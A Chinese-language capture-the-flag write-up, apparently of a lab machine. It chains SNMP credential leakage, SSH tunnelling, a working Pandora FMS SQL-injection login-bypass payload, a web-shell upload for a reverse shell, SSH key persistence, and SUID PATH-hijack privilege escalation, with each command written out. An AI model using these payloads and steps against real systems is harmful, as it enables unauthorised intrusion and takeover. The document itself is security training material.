目录
(四)Pandora FMS_SQL注入漏洞_登录绕过(2)
前言
Pandora FMS 是一个 开源的应用程序 ,用来监测网站的各种活动。监测一个网站超额或宕机,如果网站内容改变,硬盘或 CPU 被远程服务调用时(通过 SNMP 或 TCP/IP),以及其它情况。Pandora FMS 可以运行于任何操作系统, 获取数据并发送到服务器。
发现tcp:22/80端口;udp:snmp(重点测试下)
未收集到啥可利用的,接着往下。
访问80端口浏览一遍未发现可利用点
# snmpwalk -v 2c -c public 10.10.11.136
其中一条信息拿到daniel/HotelBabylon23信息
1.25.4.2.1.5.855 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
ssh登录
#ssh [email protected]
拿到danielshell。
信息收集一波,在/home/matt目录下发现user.txt,没有权限查看,且很多命令无权使用。
明显得想办法提权横向。
本地端口收集发现80端口开放但是只能本地访问,使用ssh转发出来。
#ssh -L 80:127.0.0.1:80 [email protected]
成功转发。
访问转发出来的80端口发现站点是一个pandora FMS监测网站,版本号:Pandora FMS v7.0NG.742_FIX_PERL2020,搜索历史漏洞存在sql注入漏洞
#sqlmap跑一波出现注入漏洞
使用已知载荷访问http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20acesec
之后:访问可直接进入http://127.0.0.1/pandora_console/进入admin后台
5.1 寻找上传点
发现admin tools-file manager存在文件上传漏洞
5.2 反弹shell
使用kali自带反弹shell
获取user.flag
访问shell文件http://127.0.0.1/pandora_console/images/test.php,成功反弹shell。获取交互式shell
#python3 -c "import pty;pty.spawn('/bin/bash')"
拿到在/home/matt目录拿到user.flag
由于web反弹shell不稳定,为方便测试,获取稳定shell
#ssh-keygen
#cd .ssh/
# cat id_rsa.pub > authorized_keys
#chmod 700 authorized_keys
#cat id_rsa
将id_rsa复制到本地攻击机,使用私钥登录
攻击机使用私钥登录
查找具有suid的文件
#find / -perm -u=s -type f 2>/dev/null
查看/bin/pandora_backup文件
发现文件使用tar命令,考虑环境变量提权
有具有suid权限/bin/pandora_backup文件使用tar函数,使用tar函数环境变量提权
#cd /home/matt
#echo /bin/bash >tar
#chmod +x tar
#export PATH=/home/matt:$PATH
#/bin/pandora_backup
在/root目录拿到root.flag
# snmpwalk -v 2c -c public 10.10.11.136
ssh隧道转发:
#ssh -L 80:127.0.0.1:80 [email protected]
注入点:
/include/chart_generator.php?session_id=1
(四)Pandora FMS_SQL注入漏洞_登录绕过(2)
登录绕过载荷:
/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20acesec
#find / -perm -u=s -type f 2>/dev/null 查看是否存在可利用的SUID提权。
存在使用系统命令的二进制脚本具有SUID权限可考虑直接设置环境变量进行提权。
文章评论